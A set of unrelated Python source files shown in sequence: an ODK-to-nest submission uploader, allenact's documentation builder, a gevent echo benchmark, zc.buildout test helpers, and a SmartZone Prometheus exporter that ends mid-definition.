import requests import xmltodict import time from threading import Thread from queue import Queue # Recommended use: copy this script inside the nest container, because /upload # hasn't been opened to the outside. username = "username" password = "password" aggregate_url = "https://aggurl.info" form_id = "form_id" nest_url = "http://localhost:5000/upload" auth = requests.auth.HTTPDigestAuth(username, password) num_threads = 100 def get_odk_submission(aggregate_url: str, auth: requests.auth.HTTPDigestAuth, form_id: str, uuid: str) -> dict: form_id_string = f'{form_id}[@version=null and @uiVersion=null]/{form_id}[@key={uuid}]' submission = requests.get(aggregate_url + "/view/downloadSubmission", params={"formId": form_id_string}, auth=auth) if submission.status_code == 200: submission = xmltodict.parse(submission.text)["submission"]["data"][form_id] return fix_odk_data(submission) return None def fix_odk_data(form_submission: dict) -> dict: return_submission = {} for key, value in form_submission.items(): if key not in ["orx:meta"]: new_key = key.replace("@", "") return_submission[new_key] = value return return_submission def fix_groups(sub, delim=":"): new_sub = {} for key, value in sub.items(): if isinstance(value, dict): for inner_key, inner_value in value.items(): new_sub[key + delim + inner_key] = inner_value elif key == "instanceID": new_sub["*meta-instance-id*"] = value new_sub["meta:instanceID"] = value elif key == "submissionDate": new_sub["*meta-submission-date*"] = value elif key == "isComplete": new_sub["*meta-is-complete*"] = value elif key == "markedAsCompleteDate": new_sub["*meta-date-marked-as-complete*"] = value else: new_sub[key] = value return new_sub def submitt_to_nest(sub): data = { "formId": sub["id"], "data": [sub], "content": "record", "formVersion": None, "token": "" } requests.post(nest_url, json=data) def crawl(q): while not q.empty(): index, individual_submission = q.get() try: sub = get_odk_submission(aggregate_url, auth, form_id, individual_submission) submitt_to_nest(fix_groups(sub)) except Exception as e: raise e q.task_done() q = Queue(maxsize=0) ## To pull everything from ODK and push to nest: # cursor = None # Starting cursor # for i in range(10): # params = {"formId": form_id, # "numEntries": 3000} # if cursor is not None: # params["cursor"] = cursor # submissions = [] # with open("uuids.txt") as f: # submissions = [ s.strip() for s in f.readlines()] # requests.get(aggregate_url + "/view/submissionList", # params=params, auth=auth) # try: # submissions_dict = xmltodict.parse(submissions.text)["idChunk"] # except: # time.sleep(60) # next; # print(submissions_dict["resumptionCursor"]) # cursor = submissions_dict["resumptionCursor"] # for i, individual_submission in enumerate(submissions_dict["idList"]["id"]): # q.put((i, individual_submission)) # for i in range(num_threads): # worker = Thread(target=crawl, args=(q,)) # worker.setDaemon(True) # worker.start() # q.join() # if cursor is None: # break ## To read from a file with uuids filename = "uuids.txt" with open(filename) as f: submissions = [s.strip() for s in f.readlines()] for i, individual_submission in enumerate(submissions): q.put((i, individual_submission)) for i in range(num_threads): worker = Thread(target=crawl, args=(q,)) worker.setDaemon(True) worker.start() q.join()
build_docs.py
import glob import os import shutil from pathlib import Path from subprocess import check_output from threading import Thread from typing import Dict, Union, Optional, Set, List, Sequence, Mapping from git import Git from ruamel.yaml import YAML # type: ignore from constants import ABS_PATH_OF_TOP_LEVEL_DIR class StringColors: HEADER = "\033[95m" OKBLUE = "\033[94m" OKGREEN = "\033[92m" WARNING = "\033[93m" FAIL = "\033[91m" ENDC = "\033[0m" BOLD = "\033[1m" UNDERLINE = "\033[4m" exclude_files = [ ".DS_Store", "__init__.py", "__init__.pyc", "README.md", "version.py", "run.py", "setup.py", "main.py", "main.py", ] def render_file( relative_src_path: str, src_file: str, to_file: str, modifier="" ) -> None: """Shells out to pydocmd, which creates a .md file from the docstrings of python functions and classes in the file we specify. The modifer specifies the depth at which to generate docs for classes and functions in the file. More information here: https://pypi.org/project/pydoc-markdown/ """ relative_src_namespace = relative_src_path.replace("/", ".") src_base = src_file.replace(".py", "") if relative_src_namespace == "": namespace = f"{src_base}{modifier}" else: namespace = f"{relative_src_namespace}.{src_base}{modifier}" pydoc_config = """'{ renderer: { type: markdown, code_headers: true, descriptive_class_title: false, add_method_class_prefix: true, source_linker: {type: github, repo: allenai/allenact}, header_level_by_type: { Module: 1, Class: 2, Method: 3, Function: 3, Data: 3, } } }'""" pydoc_config = " ".join(pydoc_config.split()) args = ["pydoc-markdown", "-m", namespace, pydoc_config] try: call_result = check_output([" ".join(args)], shell=True, env=os.environ).decode( "utf-8" ) # noinspection PyShadowingNames with open(to_file, "w") as f: doc_split = call_result.split("\n") # github_path = "https://github.com/allenai/allenact/tree/master/" # path = ( # github_path + namespace.replace(".", "/") + ".py" # ) # mdlink = "[[source]]({})".format(path) mdlink = "" # Removing the above source link for now. call_result = "\n".join([doc_split[0] + " " + mdlink] + doc_split[1:]) f.write(call_result) print( f"{StringColors.OKGREEN}[SUCCESS]{StringColors.ENDC} built docs for {src_file} -> {to_file}." ) except Exception as _: cmd = " ".join(args) print( f"{StringColors.WARNING}[SKIPPING]{StringColors.ENDC} could not" f" build docs for {src_file} (missing an import?). CMD: '{cmd}'" ) # noinspection PyShadowingNames def build_docs_for_file( relative_path: str, file_name: str, docs_dir: str, threads: List ) -> Dict[str, str]: """Build docs for an individual python file.""" clean_filename = file_name.replace(".py", "") markdown_filename = f"{clean_filename}.md" output_path = os.path.join(docs_dir, relative_path, markdown_filename) nav_path = os.path.join("api", relative_path, markdown_filename) thread = Thread(target=render_file, args=(relative_path, file_name, output_path)) thread.start() threads.append(thread) return {os.path.basename(clean_filename): nav_path} # noinspection PyShadowingNames def build_docs( base_dir: Union[Path, str], root_path: Union[Path, str], docs_dir: Union[Path, str], threads: List, allowed_dirs: Optional[Set[str]] = None, ): base_dir, root_path, docs_dir = str(base_dir), str(root_path), str(docs_dir) nav_root = [] for child in os.listdir(root_path): relative_path = os.path.join(root_path, child) if ( (allowed_dirs is not None) and (os.path.isdir(relative_path)) and (os.path.abspath(relative_path) not in allowed_dirs) # or ".git" in relative_path # or ".idea" in relative_path # or "__pycache__" in relative_path # or "tests" in relative_path # or "mypy_cache" in relative_path ): print("SKIPPING {}".format(relative_path)) continue # without_allenact = str(root_path).replace("allenact/", "") new_path = os.path.relpath(root_path, base_dir).replace(".", "") target_dir = os.path.join(docs_dir, new_path) if not os.path.exists(target_dir): os.mkdir(target_dir) if os.path.isdir(relative_path): nav_subsection = build_docs( base_dir, relative_path, docs_dir, threads=threads, allowed_dirs=allowed_dirs, ) if not nav_subsection: continue nav_root.append({child: nav_subsection}) else: if child in exclude_files or not child.endswith(".py"): continue nav = build_docs_for_file(new_path, child, docs_dir, threads=threads) nav_root.append(nav) return nav_root def project_readme_paths_to_nav_structure(project_readmes): nested_dict = {} for fp in project_readmes: has_seen_project_dir = False sub_nested_dict = nested_dict split_fp = os.path.dirname(fp).split("/") for i, yar in enumerate(split_fp): has_seen_project_dir = has_seen_project_dir or yar == "projects" if not has_seen_project_dir or yar == "projects": continue if yar not in sub_nested_dict: if i == len(split_fp) - 1: sub_nested_dict[yar] = fp.replace("docs/", "") break else: sub_nested_dict[yar] = {} sub_nested_dict = sub_nested_dict[yar] def recursively_create_nav_structure(nested_dict): if isinstance(nested_dict, str): return nested_dict to_return = [] for key in nested_dict: to_return.append({key: recursively_create_nav_structure(nested_dict[key])}) return to_return return recursively_create_nav_structure(nested_dict) def pruned_nav_entries(nav_entries): if isinstance(nav_entries, str): if os.path.exists(os.path.join("docs", nav_entries)): return nav_entries else: return None elif isinstance(nav_entries, Sequence): new_entries = [] for entry in nav_entries: entry = pruned_nav_entries(entry) if entry: new_entries.append(entry) return new_entries elif isinstance(nav_entries, Mapping): new_entries = {} for k, entry in nav_entries.items(): entry = pruned_nav_entries(entry) if entry: new_entries[k] = entry return new_entries else: raise NotImplementedError() def main(): os.chdir(ABS_PATH_OF_TOP_LEVEL_DIR) print("Copying all README.md files to docs.") with open("README.md") as f: readme_content = f.readlines() readme_content = [x.replace("docs/", "") for x in readme_content] with open("docs/index.md", "w") as f: f.writelines(readme_content) project_readmes = [] for readme_file_path in glob.glob("projects/**/README.md", recursive=True): if "docs/" not in readme_file_path: new_path = os.path.join("docs", readme_file_path) os.makedirs(os.path.dirname(new_path), exist_ok=True) shutil.copy(readme_file_path, new_path) project_readmes.append(new_path) print("Copying LICENSE file to docs.") shutil.copy("LICENSE", "docs/LICENSE.md") print("Copying CONTRIBUTING.md file to docs.") shutil.copy("CONTRIBUTING.md", "docs/CONTRIBUTING.md") # print("Copying CNAME file to docs.") # shutil.copy("CNAME", "docs/CNAME") print("Building the docs.") parent_folder_path = Path(__file__).parent.parent yaml_path = parent_folder_path / "mkdocs.yml" source_path = parent_folder_path docs_dir = str(parent_folder_path / "docs" / "api") if not os.path.exists(docs_dir): os.mkdir(docs_dir) # Adding project readmes to the yaml yaml = YAML() mkdocs_yaml = yaml.load(yaml_path) site_nav = mkdocs_yaml["nav"] # TODO Find a way to do the following in a way that results in nice titles. # projects_key = "Projects using allenact" # nav_obj = None # for obj in site_nav: # if projects_key in obj: # nav_obj = obj # break # nav_obj[projects_key] = project_readme_paths_to_nav_structure(project_readmes) with open(yaml_path, "w") as f: yaml.dump(mkdocs_yaml, f) # Get directories to ignore git_dirs = set( os.path.abspath(os.path.split(p)[0]) for p in Git(".").ls_files().split("\n") ) ignore_rel_dirs = ["docs", "scripts", "experiments", "src", ".pip_src"] ignore_abs_dirs = set( os.path.abspath(os.path.join(str(parent_folder_path), rel_dir)) for rel_dir in ignore_rel_dirs ) for d in ignore_abs_dirs: if d in git_dirs: git_dirs.remove(d) threads: List = [] nav_entries = build_docs( parent_folder_path, source_path, docs_dir, threads=threads, allowed_dirs=git_dirs, ) nav_entries.sort(key=lambda x: list(x)[0], reverse=False) for thread in threads: thread.join() nav_entries = pruned_nav_entries(nav_entries) docs_key = "API" # Find the yaml corresponding to the API nav_obj = None for obj in site_nav: if docs_key in obj: nav_obj = obj break nav_obj[docs_key] = nav_entries with open(yaml_path, "w") as f: yaml.dump(mkdocs_yaml, f) if __name__ == "__main__": main()
benchmark_echo.py
from gevent.server import StreamServer import gevent from gevent import socket, spawn from gevent import queue import multiprocessing import time import os """ (4765, 'New connection from 127.0.0.1:59612') on reader.. on writer.. call: 762043 KB/s, dt=1.2598 client: socker Close and sleep gevent for 0.5 sec server: transport exit server endof serve!!! The end """ NUM_CALLS = 20000 # * 50 * 2 # 0000 POOL = 100 SZ = 4096 * 12 host = 'localhost' server = None def run_server(): from gevent.server import StreamServer import gevent from gevent import socket, spawn from gevent import queue global server def _reader(f, q): print "on reader.." while True: data = f.recv(SZ) if not data: break # TODO: check this on other interfaces if len(data) != SZ: print len(data) q.put(data) def _writer(f, q): print "on writer.." while True: data = q.get() f.send(data) def _listener(sock, address): q = queue.Queue() print(os.getpid(), 'New connection from %s:%s' % address) r = spawn(_reader, sock, q) w = spawn(_writer, sock, q) r.join() print "server: transport exit" w.kill() server.close() gevent.sleep(0.5) print "XXX Should not be here. server force Halt!!" exit() server = StreamServer(('0.0.0.0', 2786), _listener) server.serve_forever() print "server endof serve!!!" # =================================== data = b'a' * SZ def beam(sock): sock.send(data) response = sock.recv(SZ) # assert len(data) == len(response) # print "*", def parallel(fobj): # pool = gevent.pool.Pool(POOL) # [pool.spawn(beam, fobj) for _ in range(NUM_CALLS)] # pool.join() [beam(fobj) for _ in range(NUM_CALLS)] def run_client(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.connect((host, 2786)) # fobj = sock.makefile(mode='r+') start = time.time() # [beam(session) for _ in range(NUM_CALLS)] parallel(sock) dt = time.time() - start print('call: %d KB/s, dt=%.4f' % (NUM_CALLS * SZ / dt / 1024, dt)) print "client: socker Close and sleep gevent for 0.5 sec" sock.close() gevent.sleep(0.5) if __name__ == '__main__': import sys if len(sys.argv) == 2 and sys.argv[1] == 'server': run_server() exit() elif len(sys.argv) == 2 and sys.argv[1] == 'client': run_client() exit() else: try: p = multiprocessing.Process(target=run_server) p.start() gevent.sleep(0.2) run_client() finally: gevent.sleep(0.4) p.terminate() p.join() print "The end"
testing.py
############################################################################# # # Copyright (c) 2004-2009 Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## """Various test-support utility functions """ try: # Python 3 from http.server import HTTPServer, BaseHTTPRequestHandler from urllib.request import urlopen except ImportError: # Python 2 from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler from urllib2 import urlopen import errno import logging import os import pkg_resources import random import re import shutil import socket import subprocess import sys import tempfile import threading import time import zc.buildout.buildout import zc.buildout.easy_install from zc.buildout.rmtree import rmtree print_ = zc.buildout.buildout.print_ fsync = getattr(os, 'fsync', lambda fileno: None) is_win32 = sys.platform == 'win32' setuptools_location = pkg_resources.working_set.find( pkg_resources.Requirement.parse('setuptools')).location def cat(dir, *names): path = os.path.join(dir, *names) if (not os.path.exists(path) and is_win32 and os.path.exists(path+'-script.py') ): path = path+'-script.py' print_(open(path).read(), end='') def ls(dir, *subs): if subs: dir = os.path.join(dir, *subs) names = sorted(os.listdir(dir)) for name in names: if os.path.isdir(os.path.join(dir, name)): print_('d ', end=' ') elif os.path.islink(os.path.join(dir, name)): print_('l ', end=' ') else: print_('- ', end=' ') print_(name) def mkdir(*path): os.mkdir(os.path.join(*path)) def remove(*path): path = os.path.join(*path) if os.path.isdir(path): shutil.rmtree(path) else: os.remove(path) def rmdir(*path): shutil.rmtree(os.path.join(*path)) def write(dir, *args): path = os.path.join(dir, *(args[:-1])) f = open(path, 'w') f.write(args[-1]) f.flush() fsync(f.fileno()) f.close() def clean_up_pyc(*path): base, filename = os.path.join(*path[:-1]), path[-1] if filename.endswith('.py'): filename += 'c' # .py -> .pyc for path in ( os.path.join(base, filename), os.path.join(base, '__pycache__'), ): if os.path.isdir(path): rmdir(path) elif os.path.exists(path): remove(path) ## FIXME - check for other platforms MUST_CLOSE_FDS = not sys.platform.startswith('win') def system(command, input='', with_exit_code=False): p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=MUST_CLOSE_FDS) i, o, e = (p.stdin, p.stdout, p.stderr) if input: i.write(input.encode()) i.close() result = o.read() + e.read() o.close() e.close() output = result.decode() if with_exit_code: # Use the with_exit_code=True parameter when you want to test the exit # code of the command you're running. output += 'EXIT CODE: %s' % p.wait() return output def get(url): return str(urlopen(url).read().decode()) def _runsetup(setup, *args): if os.path.isdir(setup): setup = os.path.join(setup, 'setup.py') args = list(args) args.insert(0, '-q') here = os.getcwd() try: os.chdir(os.path.dirname(setup)) zc.buildout.easy_install.call_subprocess( [sys.executable, setup] + args, env=dict(os.environ, PYTHONPATH=setuptools_location)) if os.path.exists('build'): rmtree('build') finally: os.chdir(here) def sdist(setup, dest): _runsetup(setup, 'sdist', '-d', dest, '--formats=zip') def bdist_egg(setup, executable, dest=None): # Backward compat: if dest is None: dest = executable else: assert executable == sys.executable, (executable, sys.executable) _runsetup(setup, 'bdist_egg', '-d', dest) def wait_until(label, func, *args, **kw): if 'timeout' in kw: kw = dict(kw) timeout = kw.pop('timeout') else: timeout = 30 deadline = time.time()+timeout while time.time() < deadline: if func(*args, **kw): return time.sleep(0.01) raise ValueError('Timed out waiting for: '+label) class TestOptions(zc.buildout.buildout.Options): def initialize(self): pass class Buildout(zc.buildout.buildout.Buildout): def __init__(self): zc.buildout.buildout.Buildout.__init__( self, '', [('buildout', 'directory', os.getcwd())]) Options = TestOptions def buildoutSetUp(test): test.globs['__tear_downs'] = __tear_downs = [] test.globs['register_teardown'] = register_teardown = __tear_downs.append prefer_final = zc.buildout.easy_install.prefer_final() register_teardown( lambda: zc.buildout.easy_install.prefer_final(prefer_final) ) here = os.getcwd() register_teardown(lambda: os.chdir(here)) handlers_before_set_up = logging.getLogger().handlers[:] def restore_root_logger_handlers(): root_logger = logging.getLogger() for handler in root_logger.handlers[:]: root_logger.removeHandler(handler) for handler in handlers_before_set_up: root_logger.addHandler(handler) register_teardown(restore_root_logger_handlers) base = tempfile.mkdtemp('buildoutSetUp') base = os.path.realpath(base) register_teardown(lambda base=base: rmtree(base)) old_home = os.environ.get('HOME') os.environ['HOME'] = os.path.join(base, 'bbbBadHome') def restore_home(): if old_home is None: del os.environ['HOME'] else: os.environ['HOME'] = old_home register_teardown(restore_home) base = os.path.join(base, '_TEST_') os.mkdir(base) tmp = tempfile.mkdtemp('buildouttests') register_teardown(lambda: rmtree(tmp)) zc.buildout.easy_install.default_index_url = 'file://'+tmp os.environ['buildout-testing-index-url'] = ( zc.buildout.easy_install.default_index_url) def tmpdir(name): path = os.path.join(base, name) mkdir(path) return path sample = tmpdir('sample-buildout') os.chdir(sample) # Create a basic buildout.cfg to avoid a warning from buildout: open('buildout.cfg', 'w').write( "[buildout]\nparts =\n" ) # Use the buildout bootstrap command to create a buildout zc.buildout.buildout.Buildout( 'buildout.cfg', [('buildout', 'log-level', 'WARNING'), # trick bootstrap into putting the buildout develop egg # in the eggs dir. ('buildout', 'develop-eggs-directory', 'eggs'), ] ).bootstrap([]) # Create the develop-eggs dir, which didn't get created the usual # way due to the trick above: os.mkdir('develop-eggs') def start_server(path): port, thread = _start_server(path, name=path) url = 'http://localhost:%s/' % port register_teardown(lambda: stop_server(url, thread)) return url cdpaths = [] def cd(*path): path = os.path.join(*path) cdpaths.append(os.path.abspath(os.getcwd())) os.chdir(path) def uncd(): os.chdir(cdpaths.pop()) test.globs.update(dict( sample_buildout = sample, ls = ls, cat = cat, mkdir = mkdir, rmdir = rmdir, remove = remove, tmpdir = tmpdir, write = write, system = system, get = get, cd = cd, uncd = uncd, join = os.path.join, sdist = sdist, bdist_egg = bdist_egg, start_server = start_server, buildout = os.path.join(sample, 'bin', 'buildout'), wait_until = wait_until, print_ = print_, clean_up_pyc = clean_up_pyc, )) zc.buildout.easy_install.prefer_final(prefer_final) def buildoutTearDown(test): for f in test.globs['__tear_downs']: f() class Server(HTTPServer): def __init__(self, tree, *args): HTTPServer.__init__(self, *args) self.tree = os.path.abspath(tree) __run = True def serve_forever(self): while self.__run: self.handle_request() def handle_error(self, *_): self.__run = False class Handler(BaseHTTPRequestHandler): Server.__log = False def __init__(self, request, address, server): self.__server = server self.tree = server.tree BaseHTTPRequestHandler.__init__(self, request, address, server) def do_GET(self): if '__stop__' in self.path: raise SystemExit def k(): self.send_response(200) out = '<html><body>k</body></html>\n'.encode() self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) if self.path == '/enable_server_logging': self.__server.__log = True return k() if self.path == '/disable_server_logging': self.__server.__log = False return k() path = os.path.abspath(os.path.join(self.tree, *self.path.split('/'))) if not ( ((path == self.tree) or path.startswith(self.tree+os.path.sep)) and os.path.exists(path) ): self.send_response(404, 'Not Found') #self.send_response(200) out = '<html><body>Not Found</body></html>'.encode() #out = '\n'.join(self.tree, self.path, path) self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) return self.send_response(200) if os.path.isdir(path): out = ['<html><body>\n'] names = sorted(os.listdir(path)) for name in names: if os.path.isdir(os.path.join(path, name)): name += '/' out.append('<a href="%s">%s</a><br>\n' % (name, name)) out.append('</body></html>\n') out = ''.join(out).encode() self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') else: out = open(path, 'rb').read() self.send_header('Content-Length', len(out)) if path.endswith('.egg'): self.send_header('Content-Type', 'application/zip') elif path.endswith('.gz'): self.send_header('Content-Type', 'application/x-gzip') elif path.endswith('.zip'): self.send_header('Content-Type', 'application/x-gzip') else: self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) def log_request(self, code): if self.__server.__log: print_('%s %s %s' % (self.command, code, self.path)) def _run(tree, port): server_address = ('localhost', port) httpd = Server(tree, server_address, Handler) httpd.serve_forever() def get_port(): for i in range(10): port = random.randrange(20000, 30000) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: try: s.connect(('localhost', port)) except socket.error: return port finally: s.close() raise RuntimeError("Can't find port") def _start_server(tree, name=''): port = get_port() thread = threading.Thread(target=_run, args=(tree, port), name=name) thread.setDaemon(True) thread.start() wait(port, up=True) return port, thread def start_server(tree): return _start_server(tree)[0] def stop_server(url, thread=None): try: urlopen(url+'__stop__') except Exception: pass if thread is not None: thread.join() # wait for thread to stop def wait(port, up): addr = 'localhost', port for i in range(120): time.sleep(0.25) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(addr) s.close() if up: break except socket.error: e = sys.exc_info()[1] if e[0] not in (errno.ECONNREFUSED, errno.ECONNRESET): raise s.close() if not up: break else: if up: raise else: raise SystemError("Couln't stop server") def install(project, destination): if not isinstance(destination, str): destination = os.path.join(destination.globs['sample_buildout'], 'eggs') dist = pkg_resources.working_set.find( pkg_resources.Requirement.parse(project)) if dist.location.endswith('.egg'): destination = os.path.join(destination, os.path.basename(dist.location), ) if os.path.isdir(dist.location): shutil.copytree(dist.location, destination) else: shutil.copyfile(dist.location, destination) else: # copy link open(os.path.join(destination, project+'.egg-link'), 'w' ).write(dist.location) def install_develop(project, destination): if not isinstance(destination, str): destination = os.path.join(destination.globs['sample_buildout'], 'develop-eggs') dist = pkg_resources.working_set.find( pkg_resources.Requirement.parse(project)) open(os.path.join(destination, project+'.egg-link'), 'w' ).write(dist.location) def _normalize_path(match): path = match.group(1) if os.path.sep == '\\': path = path.replace('\\\\', '/') if path.startswith('\\'): path = path[1:] return '/' + path.replace(os.path.sep, '/') normalize_path = ( re.compile( r'''[^'" \t\n\r]+\%(sep)s_[Tt][Ee][Ss][Tt]_\%(sep)s([^"' \t\n\r]+)''' % dict(sep=os.path.sep)), _normalize_path, ) normalize_endings = re.compile('\r\n'), '\n' normalize_script = ( re.compile('(\n?)- ([a-zA-Z_.-]+)-script.py\n- \\2.exe\n'), '\\1- \\2\n') if sys.version_info > (2, ): normalize___pycache__ = ( re.compile('(\n?)d __pycache__\n'), '\\1') else: normalize___pycache__ = ( re.compile('(\n?)- \S+\.pyc\n'), '\\1') normalize_egg_py = ( re.compile('-py\d[.]\d(-\S+)?.egg'), '-pyN.N.egg', ) normalize_exception_type_for_python_2_and_3 = ( re.compile(r'^(\w+\.)*([A-Z][A-Za-z0-9]+Error: )'), '\2') not_found = (re.compile(r'Not found: [^\n]+/(\w|\.)+/\r?\n'), '') # Setuptools now pulls in dependencies when installed. adding_find_link = (re.compile(r"Adding find link '[^']+'" r" from setuptools .*\r?\n"), '') ignore_not_upgrading = ( re.compile( 'Not upgrading because not running a local buildout command.\n' ), '')
smartzone_exporter.py
# requests used to fetch API data import requests # Allow for silencing insecure warnings from requests from requests.packages.urllib3.exceptions import InsecureRequestWarning # Builtin JSON module for testing - might not need later import json # Needed for sleep and exporter start/end time metrics import time # argparse module used for providing command-line interface import argparse # Prometheus modules for HTTP server & metrics from prometheus_client import start_http_server, Summary from prometheus_client.core import GaugeMetricFamily, CounterMetricFamily, REGISTRY # Import Treading and queue import queue import threading # Create SmartZoneCollector as a class - in Python3, classes inherit object as a base class # Only need to specify for compatibility or in Python2 class SmartZoneCollector(): # Initialize the class and specify required argument with no default value # When defining class methods, must explicitly list `self` as first argument def __init__(self, target, user, password, insecure): # Strip any trailing "/" characters from the provided url self._target = target.rstrip("/") # Take these arguments as provided, no changes needed self._user = user self._password = password self._insecure = insecure self._headers = None self._statuses = None # With the exception of uptime, all of these metrics are strings # Following the example of node_exporter, we'll set these string metrics with a default value of 1 def get_session(self): # Disable insecure request warnings if SSL verification is disabled if self._insecure == False: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Session object used to keep persistent cookies and connection pooling s = requests.Session() # Set `verify` variable to enable or disable SSL checking # Use string method format methods to create new string with inserted value (in this case, the URL) s.get('{}/wsg/api/public/v9_0/session'.format(self._target), verify=self._insecure) # Define URL arguments as a dictionary of strings 'payload' payload = {'username': self._user, 'password': self._password} # Call the payload using the json parameter r = s.post('{}/wsg/api/public/v9_0/session'.format(self._target), json=payload, verify=self._insecure) # Raise bad requests r.raise_for_status() # Create a dictionary from the cookie name-value pair, then get the value based on the JSESSIONID key session_id = r.cookies.get_dict().get('JSESSIONID') # Add HTTP headers for all requests EXCEPT logon API # Integrate the session ID into the header self._headers = {'Content-Type': 'application/json;charset=UTF-8', 'Cookie': 'JSESSIONID={}'.format(session_id)} def get_metrics(self, metrics, api_path): # Add the individual URL paths for the API call self._statuses = list(metrics.keys()) if 'query' in api_path: # For APs, use POST and API query to reduce number of requests and improve performance # To-do: set dynamic AP limit based on SmartZone inventory raw = {'page': 0, 'start': 0, 'limit': 1000} r = requests.post('{}/wsg/api/public/v9_0/{}'.format(self._target, api_path), json=raw, headers=self._headers, verify=self._insecure) else: r = requests.get('{}/wsg/api/public/v9_0/{}'.format(self._target, api_path + '?listSize=1000'), headers=self._headers, verify=self._insecure) result = json.loads(r.text) return result def collect(self): controller_metrics = { 'model': GaugeMetricFamily('smartzone_controller_model', 'SmartZone controller model', labels=["id", "model"]), 'description': GaugeMetricFamily('smartzone_controller_description', 'SmartZone controller description', labels=["id", "description"]), 'serialNumber': GaugeMetricFamily('smartzone_controller_serial_number', 'SmartZone controller serial number', labels=["id", "serialNumber"]), 'clusterRole': GaugeMetricFamily('smartzone_controller_cluster_role', 'SmartZone controller cluster role', labels=["id", "serialNumber"]), 'uptimeInSec': CounterMetricFamily('smartzone_controller_uptime_seconds', 'Controller uptime in sections', labels=["id"]), 'version': GaugeMetricFamily('smartzone_controller_version', 'Controller version', labels=["id", "version"]), 'apVersion': GaugeMetricFamily('smartzone_controller_ap_firmware_version', 'Firmware version on controller APs', labels=["id", "apVersion"]) } zone_metrics = { 'totalAPs': GaugeMetricFamily('smartzone_zone_total_aps', 'Total number of APs in zone', labels=["zone_name", "zone_id"]), 'discoveryAPs': GaugeMetricFamily('smartzone_zone_discovery_aps', 'Number of zone APs in discovery state', labels=["zone_name", "zone_id"]), 'connectedAPs': GaugeMetricFamily('smartzone_zone_connected_aps', 'Number of connected zone APs', labels=["zone_name", "zone_id"]), 'disconnectedAPs': GaugeMetricFamily('smartzone_zone_disconnected_aps', 'Number of disconnected zone APs', labels=["zone_name", "zone_id"]), 'clients': GaugeMetricFamily('smartzone_zone_total_connected_clients', 'Total number of connected clients in zone', labels=["zone_name", "zone_id"]) } system_metric = { 'cpu': { 'percent': GaugeMetricFamily('smartzone_system_cpu_usage', 'SmartZone system CPU usage', labels=["id"]) }, 'disk': { 'total': GaugeMetricFamily('smartzone_system_disk_size', 'SmartZone system disk size', labels=["id"]), 'free': GaugeMetricFamily('smartzone_system_disk_free', 'SmartZone system disk free space', labels=["id"]), }, 'memory': { 'percent': GaugeMetricFamily('smartzone_system_memory_usage', 'SmartZone system memory usage', labels=["id"]) }, 'control': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps (Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) }, 'management': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps (Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) }, 'cluster': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps (Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': 